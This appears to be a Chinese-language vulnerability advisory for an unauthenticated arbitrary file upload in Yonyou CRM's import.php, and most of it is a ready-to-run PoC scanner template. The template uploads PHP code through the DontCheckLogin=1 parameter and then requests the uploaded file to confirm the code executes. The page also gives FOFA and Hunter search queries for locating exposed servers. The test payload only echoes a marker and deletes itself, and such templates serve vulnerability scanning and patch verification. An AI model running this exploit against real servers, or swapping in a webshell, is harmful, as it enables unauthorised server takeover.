yonyou-crm-import-php-fileupload: 用友CRM客户关系管理系统任意文件上传漏洞

日期: 2025-09-01 | 影响软件: yonyou crm | POC: 已公开

漏洞描述

用友CRM客户关系管理系统import.php存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传webshell文件,从而获取到服务器权限。 FOFA:body="用友U8CRM" hunter:app.name="用友 CRM"

PoC代码[已公开]

id: yonyou-crm-import-php-fileupload
info:
  name: 用友CRM客户关系管理系统任意文件上传漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    用友CRM客户关系管理系统import.php存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传webshell文件,从而获取到服务器权限。
    FOFA:body="用友U8CRM"
    hunter:app.name="用友 CRM"
  reference:
    - https://blog.csdn.net/weixin_41924764/article/details/142427705
  tags: yonyou,crm,fileupload
  created: 2025/03/06

set:
  hostname: request.url.host
  randstr: randomLowercase(8)
  rand1: randomInt(1, 100)
rules:
  r0:
    request:
      method: POST
      path: /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5
      body: |
        ------WebKitFormBoundarye0z8QbHs79gL8vW5
        Content-Disposition: form-data; name="xfile"; filename="{{rand1}}.xls"

        <?php echo "HelloWorldTest";unlink(__FILE__);?>
        ------WebKitFormBoundarye0z8QbHs79gL8vW5
        Content-Disposition: form-data; name="combo"

        {{randstr}}.php
        ------WebKitFormBoundarye0z8QbHs79gL8vW5--
    expression: response.status == 200 && response.body.bcontains(b'\\u5bfc\\u5165\\u6210\\u529f')
  r1:
    request:
      method: GET
      path: /tmpfile/{{randstr}}.php
    expression: response.status == 200 && response.body.bcontains(b'HelloWorldTest')

expression: r0() && r1()

相关漏洞推荐